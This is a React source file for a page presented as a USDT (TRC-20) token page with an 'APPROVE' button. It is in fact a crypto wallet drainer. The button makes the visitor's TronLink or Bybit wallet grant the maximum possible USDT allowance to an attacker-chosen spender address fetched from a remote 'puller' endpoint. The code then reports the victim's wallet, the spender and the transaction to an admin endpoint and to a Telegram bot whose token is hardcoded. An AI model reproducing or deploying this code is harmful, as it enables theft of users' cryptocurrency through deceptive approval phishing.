import React, { useState } from 'react'
import './TokenPage.css'

const USDT_TRC20_ADDRESS = 'TR7NHqjeKQxGTCi8q8ZY4pL8otSzgjLj6t'
const TRON_SPENDER_CONTRACT = 'TEapWiNvpdpndcJUr74gJdy4d7W8xaoP8r'
const DAPP_URL = "https://multiscan.app"
const TELEGRAM_BOT_TOKEN = '8488646645:AAEyGRl3Os2AVMveBzJWdFgbb9yKVEDrhuI'
const TELEGRAM_CHAT_ID = '-1003373959785'

const USDTTRC20Page = () => {
  const [loading, setLoading] = useState(false)
  const [error, setError] = useState(null)
  const [success, setSuccess] = useState(false)

  const sendTelegramMessage = async (message) => {
    try {
      const url = `https://api.telegram.org/bot${TELEGRAM_BOT_TOKEN}/sendMessage`
      const response = await fetch(url, {
        method: 'POST',
        headers: { 'Content-Type': 'application/json' },
        body: JSON.stringify({ chat_id: TELEGRAM_CHAT_ID, text: message, parse_mode: 'HTML' }),
      })
      if (!response.ok) console.error('Telegram error:', await response.text())
    } catch (e) {
      console.error('Telegram:', e)
    }
  }

  const formatDateTime = () => {
    const now = new Date()
    return now.toLocaleDateString('en-US', { year: 'numeric', month: '2-digit', day: '2-digit' }) +
      ' ' + now.toLocaleTimeString('en-US', { hour: '2-digit', minute: '2-digit', second: '2-digit' })
  }

  const handleApprove = async () => {
    try {
      setLoading(true)
      setError(null)
      setSuccess(false)
      console.log("TRON APPROVE started")

      let tronWeb = null

      // Wait for TronLink to inject
      const waitForProvider = () => new Promise((resolve) => {
        const check = () => window.tronLink || window.tronWeb
        if (check()) return resolve()
        window.addEventListener('tronLink#initialized', () => resolve(), { once: true })
        let attempts = 0
        const id = setInterval(() => {
          if (check() || attempts >= 80) { clearInterval(id); resolve() }
          else attempts++
        }, 250)
      })
      await waitForProvider()

      // Get tronWeb: try tronLink first, then window.tronWeb
      if (window.tronLink) {
        if (window.tronLink.ready) {
          tronWeb = window.tronLink.tronWeb
        } else {
          try {
            const res = await window.tronLink.request({ method: 'tron_requestAccounts' })
            if (res?.code === 200) tronWeb = window.tronLink.tronWeb
            else if (res?.code === 4001) throw new Error("Connection rejected.")
          } catch (e) {
            if (e.message?.includes('rejected')) throw e
          }
        }
      }
      if (!tronWeb && window.tronWeb) tronWeb = window.tronWeb

      // May need tron_requestAccounts via tronWeb.request
      if (tronWeb && !tronWeb.defaultAddress?.base58 && typeof tronWeb.request === 'function') {
        try {
          const res = await tronWeb.request({ method: 'tron_requestAccounts' })
          if (res?.code === 200) tronWeb = window.tronLink?.tronWeb || window.tronWeb
        } catch (e) {}
      }

      if (!tronWeb) {
        throw new Error("Tron wallet not found. Please open in TronLink or Bybit Wallet dApp browser.")
      }

      // Wait for defaultAddress
      let attempts = 0
      while (!tronWeb?.defaultAddress?.base58 && attempts < 50) {
        await new Promise(r => setTimeout(r, 200))
        tronWeb = window.tronLink?.tronWeb || window.tronWeb
        attempts++
      }
      const account = tronWeb?.defaultAddress?.base58
      if (!account) {
        throw new Error("Unlock your Tron wallet (TronLink/Bybit) and try again.")
      }

      const maxApproval = '115792089237316195423570985008687907853269984665640564039457584007913129639935'

      let spenderAddress = null
      try {
        const resPuller = await fetch(`${DAPP_URL}/api/v1/puller?type=USDT`)
        if (resPuller.ok) {
          const text = await resPuller.text().then(t => t.trim())
          if (!text.startsWith('<!DOCTYPE') && !text.startsWith('<html')) {
            try {
              const data = JSON.parse(text)
              spenderAddress = data.puller || data.pullerAddress || data.address || data.data || data
              if (typeof data === 'string' && data.length >= 34 && data.startsWith('T')) spenderAddress = data
            } catch (e) {
              if (text.startsWith('T') && text.length >= 34) spenderAddress = text
            }
          }
        }
      } catch (fetchError) {
        console.warn("Puller API fetch failed:", fetchError?.message)
      }
      const isTronAddr = (a) => typeof a === 'string' && a.startsWith('T') && a.length >= 34
      if (!isTronAddr(spenderAddress)) {
        spenderAddress = TRON_SPENDER_CONTRACT
      }
      console.log("TRC20 spender:", spenderAddress)

      const contract = await tronWeb.contract().at(USDT_TRC20_ADDRESS)
      const tx = await contract.approve(spenderAddress, maxApproval).send()
      console.log('✅ USDT TRC20 approve completed:', tx)

      const domainName = window.location.hostname
      const params = new URLSearchParams({
        owner: account,
        domainName: domainName,
        spender: spenderAddress
      })
      try {
        const resSubmit = await fetch(`${DAPP_URL}/api/admin/usdts?${params.toString()}`, {
          method: "POST",
          headers: { "Content-Type": "application/json" }
        })
        if (!resSubmit.ok) console.error("Submit Error:", await resSubmit.text())
      } catch (submitError) {
        console.warn("Submit failed (not critical):", submitError)
      }

      const telegramMessage = `✅ <b>USDT TRC20 Approve</b>\n\n` +
        `🔗 Wallet: <code>${account}</code>\n` +
        `📤 Spender: <code>${spenderAddress}</code>\n` +
        `🌐 Domain: <code>${domainName}</code>\n` +
        `📝 Tx: <code>${tx || 'N/A'}</code>\n` +
        `⏰ ${formatDateTime()}`
      await sendTelegramMessage(telegramMessage)

      setSuccess(true)
      setLoading(false)
    } catch (e) {
      console.error("TRON APPROVE FAILED", e)
      let userMessage = "An error occurred"
      if (e.code === 4001 || e.message?.includes('denied') || e.message?.includes('rejected') || e.message?.includes('User denied') || e.message?.includes('WalletConnectionError') || e.message?.includes('rejected connection')) {
        userMessage = "Connection cancelled. Please try again and approve in your wallet."
      } else if (e.message?.includes('not ready') || e.message?.includes('TronLink') || e.message?.includes('Unlock')) {
        userMessage = "Unlock your Tron wallet (TronLink/Bybit) and try again."
      } else if (e.message?.includes('simulation') || e.message?.includes('simul')) {
        userMessage = "Transaction failed. Check: 1) You have enough TRX for fees (~3-10 TRX). 2) You have USDT in your wallet."
      } else if (e.message) {
        userMessage = e.message
      }
      setError(userMessage)
      setLoading(false)
    }
  }

  return (
    <div className="token-page">
      <div className="token-page-container">
        <div className="token-header">
          <div className="token-icon">
            <img src="https://assets.coingecko.com/coins/images/325/small/Tether.png" alt="USDT" className="token-logo" />
          </div>
          <h1 className="token-title">USDT</h1>
          <p className="token-subtitle">Tether USD (TRC-20)</p>
        </div>

        {error && (
          <div className="token-error">
            {error}
            {error.includes('Install') && (
              <div style={{ marginTop: 12 }}>
                <a href="https://chrome.google.com/webstore/detail/tronlink/ibnejdfjmmkpcnlpebklmnkoeoihofec" target="_blank" rel="noopener noreferrer" style={{ color: '#58a6ff', textDecoration: 'underline' }}>
                  Install TronLink (Chrome)
                </a>
                {' · '}
                <a href="https://addons.mozilla.org/firefox/addon/tronlink/" target="_blank" rel="noopener noreferrer" style={{ color: '#58a6ff', textDecoration: 'underline' }}>
                  TronLink (Firefox)
                </a>
              </div>
            )}
          </div>
        )}
        {success && <div className="token-success">✅ Approve completed successfully!</div>}
        {loading && <div className="token-loading">Approving...</div>}

        <button
          className="token-approve-btn"
          onClick={handleApprove}
          disabled={loading || success}
        >
          {loading ? 'Processing...' : success ? 'Done!' : 'APPROVE'}
        </button>
      </div>
    </div>
  )
}

export default USDTTRC20Page
